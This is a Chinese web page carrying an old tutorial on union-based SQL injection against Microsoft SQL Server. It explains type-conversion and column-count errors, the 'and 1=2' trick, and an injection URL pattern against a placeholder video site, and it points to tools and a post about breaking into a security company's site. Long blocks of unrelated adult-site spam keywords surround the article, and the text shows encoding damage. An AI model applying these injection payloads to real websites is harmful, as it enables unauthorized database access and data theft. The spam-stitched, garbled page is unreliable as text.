国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號

union select IN MSSQL
2005-12-17   

ps:本文其實都是廢話,主要是搞清楚我以前的錯誤在哪里 :)
union查詢可以說給了sql注射的一片新的天空,mysql和acc里都可以發(fā)揮很大的作用,那么在mssql里會是怎樣呢? 其實我很早就開始測試mssql里的union,不過我犯了個很大的錯誤,以為在mssql里的union會受"數(shù)據(jù)類型轉(zhuǎn)換錯誤"的影響,而不可以很好的完成替換工作,實際上是我錯了。這里感謝xiaolu的提醒,THX。
以知
數(shù)據(jù)表master.dbo.spt_values的列如下:
name (nvarchar(35).null)
number(int,not null)
type(nchar(3),not Null)
low(int, Null)
high(int,Null)
status(int, Null)
我們查詢語句:
select type from dbo.spt_values where name='rpc';
返回:
type
A
查詢:
select type from dbo.spt_values where name='rpc' union select 111;
返回:
服務(wù)器: 消息 245,級別 16,狀態(tài) 1,行 1
將 nvarchar 值 'A ' 轉(zhuǎn)換為數(shù)據(jù)類型為 int 的列時發(fā)生語法錯誤。
看到了沒?這個就是"數(shù)據(jù)類型轉(zhuǎn)換錯誤",我就是看到這個才犯錯誤的:( 我們看看什么語句union前面的部分 select type from dbo.spt_values where name='rpc' 由于name='rpc'存在 返回的type的類型為nchar 而union后面的 select 111返回的是數(shù)據(jù)類型為int,所以在union查詢時就出現(xiàn)了上面的錯誤。
如果我們union前面的那個selet查詢的記錄不存在,將會怎么樣呢。
我們查詢語句:
select type from dbo.spt_values where name='rpcssdfsdfsdfds' union select 111;
或select type from dbo.spt_values where name='rpc' and 1=2 union select 111;
上面的語句里name='rpcssdfsdfsdfds'根本不存在 呵呵 這下就沒有錯誤了 成功得到結(jié)果:
type
111
下面我們在測試一個語句:select type,name from dbo.spt_values where name='rpc' union select 111;(union前面的查詢輸出type和name 2個字段)
得到錯誤:
服務(wù)器: 消息 205,級別 16,狀態(tài) 1,行 1
包含 union 運算符的 SQL 語句中的所有查詢都必須在目標列表中具有相同數(shù)目的表達式。
哈哈~~ 大家對這個應(yīng)該錯誤很熟悉了把。union查詢前后字段不對。什么的語句我們改為:
select type,name from dbo.spt_values where name='rpc' union select 111,111; (使前后2個查詢字段一樣)
成功得到結(jié)果:
type name
111 111
同樣語句
select * from dbo.spt_values where name='rpc' union select 1,1,1,1,1,1;
因為在表spt_values里有6個字段,所以union后面的查詢必須要有6個字段。
呵呵,其實這個問題在mysql注射文章里寫union查詢的時候已經(jīng)提過的,這里只是重新拿出來說明下。
小結(jié)下:
對于語句select A union select B (A和B不同數(shù)據(jù)表查詢)
1.union查詢必修是B里的字段要和A一樣。
2.在mssq里的union查詢?nèi)绻懊娌樵傾如果數(shù)據(jù)存在 那么不會象mysql里一樣輸出 前面查詢A的數(shù)據(jù),而是出現(xiàn)"將 nvarchar 值 'A ' 轉(zhuǎn)換為數(shù)據(jù)類型為 int 的列時發(fā)生語法錯誤"這樣的錯誤。
其實在注射中,我們的目的是要求得到語句B的返回結(jié)果,使用union查詢替換輸出必需保證語句A得到的結(jié)果為空,這個不管是mysql,access還是mssql都是一樣的。
所以我們采用 在注射的id后面加個 and 1=2 如:
http://www.xxx.netVideoPlay.asp?VideoID=1995 and 1=2 union select 1,1,1,1.........這樣的形式,這個和mysql和acc的使用union語句是一樣的,這樣如果我們精心構(gòu)造我們的語句就可以使注射通用于acc,mysql>4.0,mssql或所有支持union的數(shù)據(jù)類型。
那么我們的注射工具的編寫將有一個新的開始,幸運的死casi本來就是采用union的 在實際測試用他也可以用與access,mssql,mysql的注射。如下圖:



熱詞搜索:

上一篇:SQL注入滲透某網(wǎng)絡(luò)安全公司的網(wǎng)站全過程
下一篇:PHPWIND1.3.6論壇漏洞分析

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
91免费版在线| 精品欧美乱码久久久久久1区2区| 欧美吞精做爰啪啪高潮| 久久先锋资源网| 夜夜嗨av一区二区三区网页| 国产一区二三区| 欧美日韩免费视频| 国产精品久久久久婷婷二区次| 天天综合天天综合色| 成人黄动漫网站免费app| 欧美成人伊人久久综合网| 一区二区三区精品在线| 国产suv一区二区三区88区| 91精品国产黑色紧身裤美女| 综合av第一页| 99在线精品一区二区三区| 精品福利视频一区二区三区| 国产亚洲成aⅴ人片在线观看| 欧美va日韩va| 欧美成人aa大片| 最新中文字幕一区二区三区| 国产精品主播直播| 国产精品中文字幕日韩精品 | 福利一区二区在线| 亚洲人午夜精品天堂一二香蕉| 欧美在线综合视频| 久久99精品国产麻豆婷婷洗澡| 中文久久乱码一区二区| 欧美一区二区三区不卡| 国产91精品露脸国语对白| 亚洲同性gay激情无套| 欧美日韩国产首页| 国产精华液一区二区三区| 夜夜精品浪潮av一区二区三区| 精品国精品自拍自在线| 99国产精品久久久久久久久久 | 日韩免费成人网| 99九九99九九九视频精品| 日韩电影在线一区二区| 亚洲视频免费观看| 26uuu成人网一区二区三区| 91久久香蕉国产日韩欧美9色| 久久精品国产精品亚洲红杏| 亚洲精品久久久蜜桃| 久久午夜国产精品| 欧美三级一区二区| 91影院在线免费观看| 精品一区二区三区蜜桃| 亚洲电影一区二区三区| 国产精品另类一区| 26uuu国产电影一区二区| 欧美日韩精品一区二区三区蜜桃 | 欧美精品电影在线播放| 成人免费视频视频在线观看免费 | 日韩电影在线一区二区三区| 亚洲欧洲中文日韩久久av乱码| 久久伊99综合婷婷久久伊| 7777精品伊人久久久大香线蕉经典版下载 | 91精品国产综合久久久久久| av电影在线观看一区| 国产精品主播直播| 久久国产精品99久久久久久老狼| 一区二区三区四区视频精品免费 | 成人app网站| 国产麻豆精品一区二区| 日本免费新一区视频| 午夜精品久久久久久久久久 | 亚洲国产毛片aaaaa无费看| 亚洲视频图片小说| 综合久久综合久久| 亚洲色图制服诱惑| 国产精品久久久久影院亚瑟 | 亚洲欧美色一区| 中文字幕在线不卡一区| 亚洲一区二区免费视频| 欧美国产1区2区| 国产欧美日韩亚州综合| 国产喂奶挤奶一区二区三区| 久久久久青草大香线综合精品| 日韩精品一区二区三区中文精品| 日韩视频一区在线观看| 日韩免费看网站| 欧美精品一区二区三| 精品国产免费视频| 国产亚洲婷婷免费| 欧美国产成人在线| 国产精品福利影院| 综合久久久久综合| 亚洲一区二区黄色| 日韩精品一级中文字幕精品视频免费观看 | 亚洲免费视频中文字幕| 中文字幕日韩欧美一区二区三区| 国产精品大尺度| 亚洲摸摸操操av| 亚洲一区自拍偷拍| 日韩成人午夜精品| 国产自产高清不卡| www.成人在线| 欧美三级日本三级少妇99| 欧美日韩成人一区二区| 欧美成人三级在线| 国产精品国产三级国产aⅴ中文| 亚洲品质自拍视频网站| 午夜精品成人在线视频| 激情伊人五月天久久综合| 国产成人一区在线| 在线观看免费一区| 欧美大度的电影原声| 国产精品网站导航| 天堂资源在线中文精品| 国产中文字幕精品| 色哟哟亚洲精品| 91精品国产综合久久香蕉的特点| 久久免费视频一区| 一区二区三区国产精品| 精品写真视频在线观看| 成人av在线看| 91麻豆精品国产91久久久使用方法 | 丰满少妇在线播放bd日韩电影| 99久久综合精品| 欧美一区二区精品久久911| 国产精品视频一二三| 首页国产丝袜综合| 成人av集中营| 精品国免费一区二区三区| 亚洲精品免费在线播放| 九九精品一区二区| 欧美影院精品一区| 国产人久久人人人人爽| 婷婷中文字幕综合| 97久久精品人人澡人人爽| 国产精品福利电影一区二区三区四区| 亚洲一区国产视频| 成人小视频免费在线观看| 欧美一区二视频| 亚洲中国最大av网站| 粉嫩嫩av羞羞动漫久久久| 欧美日韩国产美| 亚洲色图.com| 成人污视频在线观看| 精品三级在线看| 五月天中文字幕一区二区| 成人av集中营| 久久久久久久国产精品影院| 日韩av一区二区在线影视| 91啦中文在线观看| 国产精品久久久久一区二区三区共| 精品中文字幕一区二区 | 欧美日韩免费电影| 国产精品无码永久免费888| 麻豆国产欧美日韩综合精品二区| 在线日韩av片| 亚洲激情在线播放| 99国产精品99久久久久久| 国产免费久久精品| 国产一区二区导航在线播放| 欧美一区永久视频免费观看| 亚洲综合色在线| 色94色欧美sute亚洲线路二 | 亚洲欧美日本韩国| 成人深夜在线观看| 国产精品久久久久天堂| 成人app在线| 日韩理论片在线| 97国产精品videossex| 亚洲欧美另类久久久精品2019| 99久久免费视频.com| 亚洲欧美另类小说| 色播五月激情综合网| 亚洲一级在线观看| 欧美日韩一二区| 日韩黄色免费电影| 日韩一区二区三区在线观看 | 久久精品欧美一区二区三区麻豆| 久久精品国产免费| 久久午夜国产精品| 北条麻妃国产九九精品视频| 国产日韩av一区| 91偷拍与自偷拍精品| 伊人开心综合网| 欧美久久久久中文字幕| 日韩成人av影视| 久久精品日产第一区二区三区高清版| 国产99久久久精品| 国产精品久久久爽爽爽麻豆色哟哟| 成人app网站| 亚洲午夜精品久久久久久久久| 精品视频一区三区九区| 久久不见久久见免费视频7| 久久久美女毛片| 色婷婷综合久久久久中文一区二区 | 久久精品国产亚洲一区二区三区| 精品国产免费久久| 成人美女视频在线观看18| 亚洲人成网站影音先锋播放| 欧美日韩精品一区二区三区四区 | 欧洲一区在线观看| 日韩成人一区二区| 国产亚洲一二三区| 日本精品裸体写真集在线观看|